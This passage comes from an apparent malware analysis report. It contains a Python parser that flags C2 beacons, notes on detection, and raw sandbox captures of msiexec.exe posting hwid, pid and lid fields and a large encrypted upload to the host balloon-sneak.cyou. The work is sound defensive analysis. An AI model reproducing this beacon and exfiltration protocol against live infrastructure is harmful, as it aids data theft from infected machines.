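        eol = body.index(b"\r\n", pos)
        size = int(body[pos:eol].split(b";")[0], 16)   # ignore any chunk extension
        if size == 0:
            return bytes(out)
        pos = eol + 2
        out += body[pos:pos + size]
        pos += size + 2                                 # skip the data and its CRLF


HWID_RE = re.compile(r"^[0-9A-F]{32}$")


def classify_beacon(raw_request: bytes) -> Optional[dict]:
    """Return host/hwid/pid/lid when the request has the C2 shape seen in the report
    (POST /api, multipart form carrying hwid, pid and lid); otherwise None."""
    start, headers, body = split_http(raw_request)
    if not start.startswith("POST /api "):
        return None
    ctype = headers.get("content-type", "")
    m = re.search(r"boundary=([^;\s]+)", ctype)
    if not ctype.startswith("multipart/form-data") or not m:
        return None
    fields = parse_multipart(body, m.group(1))
    if not {"hwid", "pid", "lid"}.issubset(fields):
        return None
    hwid = fields["hwid"].decode(errors="replace")
    return {
        "host": headers.get("host", ""),
        "hwid": hwid,
        "hwid_is_32hex": bool(HWID_RE.match(hwid)),   # 32 upper-case hex chars in the capture
        "pid": fields["pid"].decode(errors="replace"),
        "lid": fields["lid"].decode(errors="replace"),
    }


def read_ack(raw_response: bytes) -> str:
    """De-chunk the C2 reply and return its text ("ok 8.46.123.228" in the capture)."""
    _, headers, body = split_http(raw_response)
    if headers.get("transfer-encoding", "").lower() == "chunked":
        body = decode_chunked(body)
    return body.decode(errors="replace")


if __name__ == "__main__":
    print(classify_beacon(REQUEST))
    print(read_ack(RESPONSE))
```

Fed the three captured requests, the parser returns the same hwid for sessions 2, 3 and 4 while pid moves from 2 to 3 and the multipart boundary changes every time (1EO9KR8T3, 38KS5A4HANM6, QHZY9VZIKCL5L); a detection should therefore key on the field names, the hwid and the fixed "ok <ip>" reply rather than on the boundary string. The reply is also always two chunks, which is why the ASCII column shows "fok 8.46.123.228" then "0": the tool strips the CRLFs around the chunk sizes.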


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
4 | 192.168.2.4 | 49758 | 172.67.170.85 | 443 | 5544 | C:\Windows\SysWOW64\msiexec.exe

Timestamp | Bytes transferred | Direction | Data
2024-11-29 14:46:09 UTC | 279 | OUT | POST /api HTTP/1.1
Connection: Keep-Alive
Content-Type: multipart/form-data; boundary=QHZY9VZIKCL5L
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
Content-Length: 20409
Host: balloon-sneak.cyou
2024-11-29 14:46:09 UTC | 15331 | OUT | Data Raw: 2d 2d 51 48 5a 59 39 56 5a 49 4b 43 4c 35 4c 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 33 36 41 35 33 41 30 41 43 45 31 42 38 37 41 33 31 36 39 34 32 38 46 39 39 44 46 42 34 37 44 39 0d 0a 2d 2d 51 48 5a 59 39 56 5a 49 4b 43 4c 35 4c 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 33 0d 0a 2d 2d 51 48 5a 59 39 56 5a 49 4b 43 4c 35 4c 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 4d 65 48 64 79 34 2d 2d 70 6c 38 76 73 30 37 0d 0a 2d 2d 51 48 5a 59 39 56 5a 49 4b
Data Ascii: --QHZY9VZIKCL5LContent-Disposition: form-data; name="hwid"36A53A0ACE1B87A3169428F99DFB47D9--QHZY9VZIKCL5LContent-Disposition: form-data; name="pid"3--QHZY9VZIKCL5LContent-Disposition: form-data; name="lid"MeHdy4--pl8vs07--QHZY9VZIK
2024-11-29 14:46:09 UTC | 5078 | OUT | Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 6c 72 83 51 b0 b0 e9 a7 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 4d 6e 20 0a 16 36 fd 34 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b0 c9 0d 46 c1 c2 a6 9f 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 36 b9 81 28 58 d8 f4 d3 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 26 37 18 05 0b 9b 7e 1a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d8 e4 06 a2 60 61 d3 4f 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Data Ascii: lrQMn 64F6(X&7~`aO
2024-11-29 14:46:12 UTC | 1017 | IN | HTTP/1.1 200 OK
Date: Fri, 29 Nov 2024 14:46:12 GMT
                                                                                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                          Set-Cookie: PHPSESSID=gfo5adtqdvfk8peiuam1pi91ph; expires=Tue, 25-Mar-2025 08:32:48 GMT; Max-Age=9999999; path=/
                                                                                                                                                                                                          Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                                                          Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                                                          Pragma: no-cache
                                                                                                                                                                                                          CF-Cache-Status: DYNAMIC
                                                                                                                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=eaLiQ%2B8qKglOzyIui3Tc3Q81WeeKG1eCP8NiKp0qWyckZB5SJuovsQuQ7xAgTf9tha3EswmjeU4%2BokZevywDuqfTCp6Oyn%2BeCQAFvy2jOA8UVuHxVq2e5HmsxyErCM5aeU0QAaE%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                          Server: cloudflare
                                                                                                                                                                                                          CF-RAY: 8ea362b3d828ef9d-EWR
                                                                                                                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=1790&min_rtt=1790&rtt_var=895&sent=21&recv=28&lost=0&retrans=1&sent_bytes=4230&recv_bytes=21368&delivery_rate=39156&cwnd=98&unsent_bytes=0&cid=fb8e18977cb2972e&ts=3174&x=0"
                                                                                                                                                                                                          2024-11-29 14:46:12 UTC20INData Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 32 32 38 0d 0a
                                                                                                                                                                                                          Data Ascii: fok 8.46.123.228
                                                                                                                                                                                                          2024-11-29 14:46:12 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                          Data Ascii: 0


Session ID    Source IP      Source Port    Destination IP    Destination Port    PID     Process
5             192.168.2.4    49771          172.67.170.85     443                 5544    C:\Windows\SysWOW64\msiexec.exe
Timestamp                  Bytes transferred    Direction    Data
2024-11-29 14:46:13 UTC    282                  OUT          POST /api HTTP/1.1
Connection: Keep-Alive
Content-Type: multipart/form-data; boundary=W72OX4OUIQ3F8WYSF
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
Content-Length: 1237
Host: balloon-sneak.cyou
2024-11-29 14:46:13 UTC    1237                 OUT          Data Raw: 2d 2d 57 37 32 4f 58 34 4f 55 49 51 33 46 38 57 59 53 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 33 36 41 35 33 41 30 41 43 45 31 42 38 37 41 33 31 36 39 34 32 38 46 39 39 44 46 42 34 37 44 39 0d 0a 2d 2d 57 37 32 4f 58 34 4f 55 49 51 33 46 38 57 59 53 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 57 37 32 4f 58 34 4f 55 49 51 33 46 38 57 59 53 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 4d 65 48 64 79 34 2d 2d 70 6c 38 76 73 30 37 0d
Data Ascii: --W72OX4OUIQ3F8WYSFContent-Disposition: form-data; name="hwid"36A53A0ACE1B87A3169428F99DFB47D9--W72OX4OUIQ3F8WYSFContent-Disposition: form-data; name="pid"1--W72OX4OUIQ3F8WYSFContent-Disposition: form-data; name="lid"MeHdy4--pl8vs07
2024-11-29 14:46:16 UTC    1024                 IN           HTTP/1.1 200 OK
Date: Fri, 29 Nov 2024 14:46:16 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close
Set-Cookie: PHPSESSID=2418atgl91ljhorh84l30gc5js; expires=Tue, 25-Mar-2025 08:32:53 GMT; Max-Age=9999999; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
CF-Cache-Status: DYNAMIC
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=rZOS%2FPjrYtJcJIjnn5RnKz5bB%2Ff3P%2Be99OddqhNFSOV4%2BghbckDwvGOhaLRZmSks2Fjf%2BCqqk%2FJ2ct%2BTQF4N293FtiRKa05gLMbZVEOREJ3xdb3vXLizWg4XJQspLeBsyOfGduM%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 8ea362d1da477cf9-EWR
alt-svc: h3=":443"; ma=86400
server-timing: cfL4;desc="?proto=TCP&rtt=1913&min_rtt=1913&rtt_var=956&sent=6&recv=8&lost=0&retrans=1&sent_bytes=4230&recv_bytes=2155&delivery_rate=193045&cwnd=207&unsent_bytes=0&cid=5dc4adec8aa7e409&ts=2628&x=0"
2024-11-29 14:46:16 UTC    20                   IN           Data Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 32 32 38 0d 0a
Data Ascii: fok 8.46.123.228
2024-11-29 14:46:16 UTC    5                    IN           Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0


                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                          6192.168.2.449783172.67.170.854435544C:\Windows\SysWOW64\msiexec.exe
                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                          2024-11-29 14:46:18 UTC282OUTPOST /api HTTP/1.1
                                                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                                                          Content-Type: multipart/form-data; boundary=XMVUGMOX0EZFEHT
                                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                                                          Content-Length: 476224
                                                                                                                                                                                                          Host: balloon-sneak.cyou
                                                                                                                                                                                                          2024-11-29 14:46:18 UTC15331OUTData Raw: 2d 2d 58 4d 56 55 47 4d 4f 58 30 45 5a 46 45 48 54 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 33 36 41 35 33 41 30 41 43 45 31 42 38 37 41 33 31 36 39 34 32 38 46 39 39 44 46 42 34 37 44 39 0d 0a 2d 2d 58 4d 56 55 47 4d 4f 58 30 45 5a 46 45 48 54 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 58 4d 56 55 47 4d 4f 58 30 45 5a 46 45 48 54 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 4d 65 48 64 79 34 2d 2d 70 6c 38 76 73 30 37 0d 0a 2d 2d 58 4d 56
                                                                                                                                                                                                          Data Ascii: --XMVUGMOX0EZFEHTContent-Disposition: form-data; name="hwid"36A53A0ACE1B87A3169428F99DFB47D9--XMVUGMOX0EZFEHTContent-Disposition: form-data; name="pid"1--XMVUGMOX0EZFEHTContent-Disposition: form-data; name="lid"MeHdy4--pl8vs07--XMV
                                                                                                                                                                                                          2024-11-29 14:46:18 UTC15331OUTData Raw: 95 aa 95 e2 07 49 6d fc d4 75 8c 89 13 dd cb 36 7e 60 f2 29 70 3c 9c aa 7c ff 3c 02 ea 0d 51 1a 0a df 8d 1b 06 3c c9 31 b1 fe 3f 97 11 f6 55 00 4d 5c ce cd b6 f8 cb 80 ed 93 7c 74 1a 5b 41 cc 74 81 ee 69 2c 10 bb a2 0e 2b e5 13 92 43 7c 0b ce 3a 0b 0a 04 48 13 d7 6f 8c 9f 88 13 a0 cd 17 ab 4f c5 df 09 b7 db 88 08 38 16 b6 97 61 f4 87 90 ad b3 f3 41 94 71 10 5e 1f 94 74 04 f9 4f e6 41 70 36 54 29 85 3f d2 0c 17 ee 07 0e 5a 9d 80 5c cd f3 16 44 aa 6f 5c 5a 14 b8 f1 6f cb c7 01 97 be b1 be 77 69 23 f6 43 4e ef d0 a1 9a f5 1b 57 a9 50 81 7d 45 87 49 c9 d5 c4 10 d7 c9 b4 28 14 dc bb df 47 c4 08 13 8a 4c 3b 31 34 2d 07 03 92 fc e3 a9 b9 a0 38 d8 d1 65 cd a1 41 03 3f 1d b0 74 f0 7d 9f 1e d8 6e 2c bf fb e6 d4 e8 e0 c5 dd fd de 37 4e f6 4a f7 4e 8e 29 da bf 75 28
                                                                                                                                                                                                          Data Ascii: Imu6~`)p<|<Q<1?UM\|t[Ati,+C|:HoO8aAq^tOAp6T)?Z\Do\Zowi#CNWP}EI(GL;14-8eA?t}n,7NJN)u(
                                                                                                                                                                                                          2024-11-29 14:46:18 UTC15331OUTData Raw: e4 8b 61 de 63 9a a5 43 06 f2 7c ac e4 a4 2e 2d b5 4e a4 d4 4b 74 61 6a b5 14 de b6 06 e3 03 86 6b a9 26 dc ef 1f c7 e3 ca 46 27 a7 a7 a3 eb f4 27 94 9c 55 c0 4e c7 08 88 20 b7 0f 4f b5 0c 24 aa 28 29 46 c4 fd 7a 7f e2 98 7c a4 81 53 97 21 ce ef b8 0a 9f 1f 2f 5f ad ab 83 7b d4 58 f6 eb 5d 06 81 ff ae 9a f5 b4 c0 ab 12 1e 1e cd cf 23 1e 8b e6 17 5a 53 ea 5b 12 da d9 24 a7 fd 6a a3 f6 51 1c 41 0e 25 b4 07 67 f2 50 77 49 bc 52 e5 95 60 6a cb 9d d0 da 3d f9 93 72 fd fc df d5 b3 26 af 8c fe 3e 1b 7d 35 3d 64 1f df dd 20 d1 3e 6a b3 e1 f3 c6 68 d8 5f fc 97 62 ed 54 08 3f fa 27 b3 7b dd e9 8a df a3 4c 43 44 67 96 68 56 6e 8b ac d0 fa 70 ec b1 21 a8 3b 6a 4b e4 e9 8e 02 95 74 96 f2 04 2f 5d 24 43 e2 05 3b 58 34 5d 8c 39 be 39 cb ed 7e cf d1 6f 35 c1 7b e8 ff da
                                                                                                                                                                                                          Data Ascii: acC|.-NKtajk&F''UN O$()Fz|S!/_{X]#ZS[$jQA%gPwIR`j=r&>}5=d >jh_bT?'{LCDghVnp!;jKt/]$C;X4]99~o5{
                                                                                                                                                                                                          2024-11-29 14:46:18 UTC15331OUTData Raw: b1 db 1b 28 69 4c 33 7a 79 eb 59 2c 55 8c 5d 76 73 37 3d ca fa d3 b3 bd 9f d0 30 a3 72 c9 e5 c0 c6 8b 7e 81 9e cc 8a cf 23 35 15 2f ff 61 31 b9 f9 b1 a7 ab a7 56 fe 38 31 a9 cd e7 84 ba c6 7e 6e fd a6 fa 1a bb db bc e2 5c fb b4 3f 93 9a b7 17 38 0a 17 01 cc ad d3 c0 f1 c2 0e 9e 9d 3a bd b2 85 c2 2c b7 61 09 56 e9 81 36 0e 47 1d 1f 6e f3 75 fd d1 bd 08 ab 09 b9 c9 02 69 20 1b 13 72 cb 6b 1e a2 db 85 da 1b 7c 50 c7 cf f4 be 21 b7 99 3c 0d b7 d0 02 0e 1f 7f 6d 20 3e c2 14 78 c8 ff 7f 47 a0 23 99 a3 10 28 43 43 4d 06 e0 5a 59 2e 22 b2 24 22 35 4b 51 e0 42 c8 53 6d be 35 ba b8 2a f6 d5 2b c5 21 ad 1f 80 b0 87 e8 88 79 86 25 7e 99 74 f5 e0 06 16 3f 31 8c 52 41 81 c4 8f 9c 10 9b 08 9b c4 50 c3 26 ab d2 20 da f8 6c e3 82 ab 01 eb 2e dd f5 c6 4d e3 de 19 c3 b5 3e
                                                                                                                                                                                                          Data Ascii: (iL3zyY,U]vs7=0r~#5/a1V81~n\?8:,aV6Gnui rk|P!<m >xG#(CCMZY."$"5KQBSm5*+!y%~t?1RAP& l.M>
                                                                                                                                                                                                          2024-11-29 14:46:18 UTC15331OUTData Raw: 73 ff 34 51 0e a2 2c 85 49 3d e3 a0 ff 17 15 2e d3 97 e7 bd b4 ed 69 84 79 be 8c 7c ed 02 98 4a 98 13 f2 6a 7e 8f 19 cb 48 34 b5 27 fe 1b 89 40 53 43 c5 f6 48 63 e7 51 9e 68 f3 76 94 b9 93 c6 af cb f8 97 7e 5b ef 41 74 c7 b9 00 56 1f 82 c4 32 02 98 be e9 74 9b 35 33 bb f3 e4 ea 09 ce 35 03 3c 7e 4a 37 f8 ab 64 20 96 07 23 8c e9 55 18 47 33 a2 8a ba 8d e6 64 3f 58 33 9a 8c b1 e1 42 8d f2 56 ee 99 4e 49 a3 23 e3 77 66 86 2a e2 37 5f 0a 50 f8 39 77 46 83 b1 f5 a4 da eb 4c 66 c4 df 83 e4 3a 89 48 e3 3a 04 3b 10 26 51 8e ba 44 a4 f5 a1 19 71 e5 ea e9 f0 3d be a5 a7 7c 2a 92 c9 96 f6 19 09 38 21 c1 fd 8c 92 3d bb 74 b8 a4 ef b2 a6 37 9e 49 44 1e e6 33 a9 fa b1 d2 a4 75 73 35 b3 75 8b 3b ac 49 07 23 04 5e 0f a8 8d 67 bd e1 02 7f be 8e 3d 89 ac 31 d2 cd 4a e0 15
                                                                                                                                                                                                          Data Ascii: s4Q,I=.iy|Jj~H4'@SCHcQhv~[AtV2t535<~J7d #UG3d?X3BVNI#wf*7_P9wFLf:H:;&QDq=|*8!=t7ID3us5u;I#^g=1J
                                                                                                                                                                                                          2024-11-29 14:46:18 UTC15331OUTData Raw: 6e 0c 29 49 cd 54 8e fb 91 a8 1b 4c 8a 23 7d 7b 18 f5 fc b0 ac 28 70 6c 92 1b 8a d4 f9 fa 6d c9 32 bd a2 a3 29 9e 73 45 58 fc c7 df dc 0e 57 ec 1d 38 c8 1f 3a 81 09 f5 47 fd 58 c0 c5 66 d5 99 d0 cc c3 26 42 24 38 f3 4f 02 2b bd 58 09 2a d7 c6 c1 b2 6f 7a 45 61 f6 6e 19 d8 10 03 bf e4 62 d7 47 89 0e b6 bd 3a 4b ac ae ef 96 b0 bd f0 c2 8b a7 ff 3b 4c 73 3d 03 7b 87 4b 5a 84 fe 0a b1 13 55 65 22 a9 b0 cd 58 ad 28 cb 6e 5d ad f6 19 ca 50 f7 c3 bc d7 07 f7 67 9f b9 80 be b9 c6 38 b3 33 53 e4 2a 74 93 aa ae b9 8c 9e 45 2f e7 cc d8 1c 25 d3 59 4b aa b4 31 00 de a2 19 f3 ac 3e 52 9a 08 20 ec 11 8b 52 e2 66 37 6c af 0d fe bb 2e 39 52 c3 ec 9c fa 99 20 77 dc 19 de 07 1a 54 76 f6 3b cc b6 40 18 70 48 8a 21 df 00 53 c3 2e 71 81 07 e2 0c 3d 44 da dd bd be ef fd d6 ec
                                                                                                                                                                                                          Data Ascii: n)ITL#}{(plm2)sEXW8:GXf&B$8O+X*ozEanbG:K;Ls={KZUe"X(n]Pg83S*tE/%YK1>R Rf7l.9R wTv;@pH!S.q=D
                                                                                                                                                                                                          2024-11-29 14:46:18 UTC15331OUTData Raw: 58 0b 31 66 bc e0 36 71 fb ff 9d 1d 9b c1 29 b3 cb 07 fa bd 77 eb 34 d2 c4 cf 5d b3 0e 3f 0f 34 5b c3 20 88 29 54 e4 ec a4 97 e2 db 2f bf e3 1c 1f f8 f7 9e 7f b6 b6 9f e1 a1 cd cb b1 e3 61 c7 2a 52 37 f4 de 13 5e 32 61 82 42 d3 7c ff 43 d2 a1 19 13 58 e2 f9 bf 69 b6 93 32 40 e3 b0 36 bd 9f d2 f1 50 86 97 1b 98 be 4c 39 e4 ea ce 83 e0 79 30 7f 2e fc 63 8f c8 dd 0f 6c 60 f1 4d 08 04 2b 9c 29 0e b1 63 1f 96 43 b6 2f a5 32 fc 9b 41 47 f1 62 5a 2f e1 02 79 9f 26 db 94 6e d7 6f 95 2c 32 e2 6a a8 f3 94 6c b6 6e ce 30 47 be d2 f0 ba f3 c0 70 2a 43 1e da 87 18 fe 4f 89 50 d5 6c 81 82 48 35 23 62 2d 22 2a 21 e6 76 36 3c 80 b1 de 1e 82 1d 0f 46 53 4b 1d b2 32 39 66 a9 a2 63 7d a6 f8 9a 23 97 8d 98 f3 7f a8 c6 5c 99 88 d0 c1 99 76 df bf 85 de 14 51 4a 59 a9 34 fb 8a
                                                                                                                                                                                                          Data Ascii: X1f6q)w4]?4[ )T/a*R7^2aB|CXi2@6PL9y0.cl`M+)cC/2AGbZ/y&no,2jln0Gp*COPlH5#b-"*!v6<FSK29fc}#\vQJY4
                                                                                                                                                                                                          2024-11-29 14:46:18 UTC15331OUTData Raw: 83 3e f7 84 38 95 6d 73 df fd 7b e3 1a 5a b8 f7 c7 ab dd 9e 36 32 58 9a a9 f1 b9 4c 72 e9 90 b5 d5 e3 46 84 ea 78 3f ec f0 6a 7d 43 f1 8d b5 6c 11 c3 a1 9d 69 4b 53 de 4f c8 e7 91 a1 8e c3 cf 71 5a 26 2d 06 0a c0 23 2b f3 f6 b1 01 4c 23 35 ca 93 e5 4e 70 63 a1 ca 0c c8 8c 7e ee ba 08 ca 8b 6b b9 0f 7e 15 37 26 a7 e4 ba 2e 7e 3a 24 be af b4 bd 98 5b d5 55 6f fe 5c 46 7f 65 49 65 55 e5 f7 d6 e3 2d 96 75 16 6f fa 51 18 78 c7 4c fe e8 ab 33 99 90 59 32 a4 74 a3 79 b7 69 6b 5e fa 79 62 fe 35 6e 5d 5a ea a7 6b f9 70 09 ca de 12 60 14 e3 86 ef 1b 53 85 a5 46 31 3e 13 3b bf dc 8e 63 f5 0c e4 9a 24 35 48 46 bb 10 02 31 3b 15 48 1b 9e 30 25 06 11 92 13 34 48 f1 a9 9c e2 ae 8b 78 43 ed bb 32 8b dd 9f de 90 fb bc 52 f8 93 5d a3 6b b2 a5 0b 0e d3 6b f4 ce 7b fe eb d5
                                                                                                                                                                                                          Data Ascii: >8ms{Z62XLrFx?j}CliKSOqZ&-#+L#5Npc~k~7&.~:$[Uo\FeIeU-uoQxL3Y2tyik^yb5n]Zkp`SF1>;c$5HF1;H0%4HxC2R]kk{
                                                                                                                                                                                                          2024-11-29 14:46:18 UTC15331OUTData Raw: 9c ba e6 36 7f 9f 8b 08 68 cf a8 69 7d e1 2d 7d f6 2f aa 93 66 7c e5 16 35 25 b7 e2 fc 70 82 e5 e1 c5 66 75 fd 53 27 94 de bf de 70 d4 dd 76 3a 58 13 f7 09 46 5e 50 13 01 64 75 a6 be ff 2e b3 fe 2c 23 88 8c 8f 05 47 29 3b c3 8e 94 26 b5 27 b3 db a9 63 9c af 0e 18 54 a5 3c 7f 57 8d d4 ef 12 5a ba 42 68 80 51 52 f3 83 0e ee f1 1a 1b ac 99 c6 10 09 c1 6a cd 32 13 ca a7 1b b5 97 b2 7a 9d 39 f4 58 59 0d fa f3 17 60 b9 93 e5 5a 05 a6 b2 fa 29 27 3e 39 9a 87 56 4d 48 e8 6a 94 f0 a6 e6 89 67 6f 5c 61 d7 b8 51 82 0d 4a 0e f7 73 d8 4e db 60 14 56 52 ab fc e9 31 15 e6 8d a5 b9 3e cf 20 9e af 64 1f e0 8d 08 c4 7c 45 04 0c 86 00 5a 01 12 af 33 5d 64 55 72 19 6d 8f b2 9b 4c 65 65 66 5e 77 7b 87 ef 7c 38 8d bb 69 cd 35 a4 c6 ff 71 0d 69 dd 38 a9 49 a8 63 d0 d9 53 b4 76
                                                                                                                                                                                                          Data Ascii: 6hi}-}/f|5%pfuS'pv:XF^Pdu.,#G);&'cT<WZBhQRj2z9XY`Z)'>9VMHjgo\aQJsN`VR1> d|EZ3]dUrmLeef^w{|8i5qi8IcSv
                                                                                                                                                                                                          2024-11-29 14:46:18 UTC15331OUTData Raw: 5b e0 7c 9c 9e f7 49 1b f0 0f d2 3e 20 90 30 24 e3 6f 49 00 ae b6 65 f1 1c 7e da 9c f9 50 f5 89 5a c4 ff 39 e7 b2 9c b8 2f a6 a0 29 e9 14 53 69 bb bf 0b 0c b8 f3 91 32 c0 3e f0 1a 49 4a a3 d7 21 d6 a7 bb 2c 89 6a ca 74 39 b6 9b 2c 78 31 b1 5e 00 7f 79 2c 52 a9 23 00 82 98 e9 45 3b 9c 37 14 2c 3d 36 6e 45 8c 70 c0 5f 1c 74 87 dc 51 a4 1e e4 98 20 84 bb 1a c8 0c b9 cf 13 f8 60 0c 13 4c 64 e7 44 0b 43 c1 eb 99 ed 3c 4a 21 07 3a 83 1b 1c f7 b3 cc fd 1d f9 ac 82 cf 68 6a ec b5 ea bf d9 84 0d ff 98 66 58 23 43 50 bc ad dc 2e 7c 55 1c 74 99 87 dc 7d 58 70 35 47 4f 05 56 7c 3c 26 8a 58 4e 53 cc dc d7 ee be 7b 07 dc 97 b3 d2 54 1b f8 a1 20 0a 5f d7 68 11 f4 51 ec 68 c7 db d7 7c 7f 3b 1a f7 fc 6b 8e ca 5e f9 74 95 f2 97 de 30 b2 e0 36 17 6f f9 a5 b3 9b 01 ec 7b f8
                                                                                                                                                                                                          Data Ascii: [|I> 0$oIe~PZ9/)Si2>IJ!,jt9,x1^y,R#E;7,=6nEp_tQ `LdDC<J!:hjfX#CP.|Ut}Xp5GOV|<&XNS{T _hQh|;k^t06o{
2024-11-29 14:46:23 UTC | 1029 | IN | HTTP/1.1 200 OK
Date: Fri, 29 Nov 2024 14:46:23 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close
Set-Cookie: PHPSESSID=qv2oh5997qmort5eb0em8k1e5t; expires=Tue, 25-Mar-2025 08:32:59 GMT; Max-Age=9999999; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
CF-Cache-Status: DYNAMIC
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=HhCfDL%2BTOyMlEEM5SBkYRhFlqcJJ6nJc%2F68YBoWzVMLpQ1CSmFu9DKwv%2FOkUj%2BCGSYDDxya8J3uMLYmuEKrOU1Lq2MdjlhqnbOxilXXVlqhk0hIWgi%2BI8%2BsNe5Gsmo39idBGm6w%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 8ea362ef4fb343d7-EWR
alt-svc: h3=":443"; ma=86400
server-timing: cfL4;desc="?proto=TCP&rtt=2175&min_rtt=1635&rtt_var=999&sent=272&recv=512&lost=0&retrans=0&sent_bytes=2844&recv_bytes=478506&delivery_rate=1785932&cwnd=198&unsent_bytes=0&cid=ee4c6b11914236b2&ts=4599&x=0"


Session ID | Source IP   | Source Port | Destination IP | Destination Port | PID  | Process
7          | 192.168.2.4 | 49795       | 172.67.170.85  | 443              | 5544 | C:\Windows\SysWOW64\msiexec.exe

Timestamp | Bytes transferred | Direction | Data
2024-11-29 14:46:24 UTC | 266 | OUT | POST /api HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
Content-Length: 84
Host: balloon-sneak.cyou
2024-11-29 14:46:24 UTC | 84 | OUT | Data Raw: 61 63 74 3d 67 65 74 5f 6d 65 73 73 61 67 65 26 76 65 72 3d 34 2e 30 26 6c 69 64 3d 4d 65 48 64 79 34 2d 2d 70 6c 38 76 73 30 37 26 6a 3d 26 68 77 69 64 3d 33 36 41 35 33 41 30 41 43 45 31 42 38 37 41 33 31 36 39 34 32 38 46 39 39 44 46 42 34 37 44 39
